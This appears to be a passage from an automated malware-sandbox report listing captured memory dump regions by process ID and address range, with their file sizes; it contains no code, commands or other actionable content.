                          • memory/2272-184-0x0000000000D80000-0x0000000000D8C000-memory.dmp
                            Filesize

                            48KB

                          • memory/2272-183-0x0000000000D90000-0x0000000000D97000-memory.dmp
                            Filesize

                            28KB

                          • memory/2272-179-0x0000000000000000-mapping.dmp
                          • memory/2752-120-0x0000000000000000-mapping.dmp
                          • memory/2752-125-0x0000000000400000-0x00000000004CD000-memory.dmp
                            Filesize

                            820KB

                          • memory/2752-124-0x00000000004D0000-0x000000000057E000-memory.dmp
                            Filesize

                            696KB

                          • memory/2936-225-0x0000000000400000-0x0000000000823000-memory.dmp
                            Filesize

                            4.1MB

                          • memory/2936-224-0x0000000000830000-0x00000000008DE000-memory.dmp
                            Filesize

                            696KB

                          • memory/2996-217-0x0000000000000000-mapping.dmp
                          • memory/3016-182-0x0000000000510000-0x000000000051A000-memory.dmp
                            Filesize

                            40KB

                          • memory/3016-155-0x0000000000000000-mapping.dmp
                          • memory/3044-311-0x000000007E210000-0x000000007E211000-memory.dmp
                            Filesize

                            4KB

                          • memory/3044-266-0x0000000000000000-mapping.dmp
                          • memory/3044-313-0x0000000004973000-0x0000000004974000-memory.dmp
                            Filesize

                            4KB

                          • memory/3044-278-0x0000000004972000-0x0000000004973000-memory.dmp
                            Filesize

                            4KB

                          • memory/3044-276-0x0000000004970000-0x0000000004971000-memory.dmp
                            Filesize

                            4KB

                          • memory/3064-119-0x0000000000CF0000-0x0000000000D06000-memory.dmp
                            Filesize

                            88KB

                          • memory/3064-126-0x0000000002600000-0x0000000002616000-memory.dmp
                            Filesize

                            88KB

                          • memory/3064-212-0x00000000063F0000-0x0000000006406000-memory.dmp
                            Filesize

                            88KB

                          • memory/3064-154-0x0000000002A70000-0x0000000002A86000-memory.dmp
                            Filesize

                            88KB

                          • memory/3148-210-0x0000000000000000-mapping.dmp
                          • memory/3480-187-0x0000000000000000-mapping.dmp
                          • memory/3480-199-0x0000000000900000-0x0000000000911000-memory.dmp
                            Filesize

                            68KB

                          • memory/3480-201-0x0000000000400000-0x0000000000826000-memory.dmp
                            Filesize

                            4.1MB

                          • memory/3480-200-0x0000000000940000-0x0000000000A8A000-memory.dmp
                            Filesize

                            1.3MB

                          • memory/3652-234-0x0000000001590000-0x0000000001591000-memory.dmp
                            Filesize

                            4KB

                          • memory/3652-230-0x0000000000D40000-0x0000000000D41000-memory.dmp
                            Filesize

                            4KB

                          • memory/3652-233-0x000000001BCF0000-0x000000001BCF1000-memory.dmp
                            Filesize

                            4KB

                          • memory/3652-227-0x0000000000000000-mapping.dmp
                          • memory/3652-232-0x000000001BE30000-0x000000001BE32000-memory.dmp
                            Filesize

                            8KB

                          • memory/3716-215-0x0000000000000000-mapping.dmp
                          • memory/3900-191-0x0000000006400000-0x0000000006401000-memory.dmp
                            Filesize

                            4KB

                          • memory/3900-158-0x0000000000000000-mapping.dmp
                          • memory/3900-178-0x0000000004F90000-0x0000000004F91000-memory.dmp
                            Filesize

                            4KB

                          • memory/3900-198-0x0000000006D00000-0x0000000006D01000-memory.dmp
                            Filesize

                            4KB

                          • memory/3900-197-0x0000000007550000-0x0000000007551000-memory.dmp
                            Filesize

                            4KB

                          • memory/3900-174-0x0000000075E00000-0x0000000077148000-memory.dmp
                            Filesize

                            19.3MB

                          • memory/3900-173-0x0000000075610000-0x0000000075B94000-memory.dmp
                            Filesize

                            5.5MB

                          • memory/3900-168-0x0000000071C60000-0x0000000071CE0000-memory.dmp
                            Filesize

                            512KB

                          • memory/3900-165-0x0000000001370000-0x0000000001371000-memory.dmp
                            Filesize

                            4KB

                          • memory/3900-166-0x0000000002AB0000-0x0000000002AF5000-memory.dmp
                            Filesize

                            276KB

                          • memory/3900-164-0x0000000075C60000-0x0000000075D51000-memory.dmp
                            Filesize

                            964KB

                          • memory/3900-247-0x0000000000400000-0x00000000004F1000-memory.dmp
                            Filesize

                            964KB

                          • memory/3900-253-0x000000000049259C-mapping.dmp
                          • memory/3900-254-0x0000000000400000-0x00000000004F1000-memory.dmp
                            Filesize

                            964KB

                          • memory/3900-163-0x0000000074F40000-0x0000000075102000-memory.dmp
                            Filesize

                            1.8MB

                          • memory/3900-162-0x0000000000130000-0x0000000000131000-memory.dmp
                            Filesize

                            4KB

                          • memory/3900-161-0x0000000001370000-0x000000000140E000-memory.dmp
                            Filesize

                            632KB

                          • memory/3900-176-0x000000006FEB0000-0x000000006FEFB000-memory.dmp
                            Filesize

                            300KB

                          • memory/3900-196-0x0000000006E50000-0x0000000006E51000-memory.dmp
                            Filesize

                            4KB

                          • memory/3900-186-0x00000000060F0000-0x00000000060F1000-memory.dmp
                            Filesize

                            4KB

                          • memory/3900-190-0x00000000062E0000-0x00000000062E1000-memory.dmp
                            Filesize

                            4KB

                          • memory/3900-185-0x0000000006580000-0x0000000006581000-memory.dmp
                            Filesize

                            4KB

                          • memory/3900-192-0x00000000060C0000-0x00000000060C1000-memory.dmp
                            Filesize

                            4KB

                          • memory/3928-117-0x0000000000030000-0x0000000000039000-memory.dmp
                            Filesize

                            36KB

                          • memory/3928-118-0x00000000001C0000-0x00000000001C9000-memory.dmp
                            Filesize

                            36KB

                          • memory/4044-223-0x00000000004A0000-0x00000000004A1000-memory.dmp
                            Filesize

                            4KB

                          • memory/4044-220-0x0000000000590000-0x00000000005A5000-memory.dmp
                            Filesize

                            84KB

                          • memory/4044-221-0x0000000000599A6B-mapping.dmp
                          • memory/4044-222-0x00000000004A0000-0x00000000004A1000-memory.dmp
                            Filesize

                            4KB

                          • memory/4204-368-0x0000000000000000-mapping.dmp
                          • memory/4204-384-0x0000000006DF0000-0x0000000006DF1000-memory.dmp
                            Filesize

                            4KB

                          • memory/4204-394-0x0000000006DF2000-0x0000000006DF3000-memory.dmp
                            Filesize

                            4KB

                          • memory/4204-464-0x000000007F390000-0x000000007F391000-memory.dmp
                            Filesize

                            4KB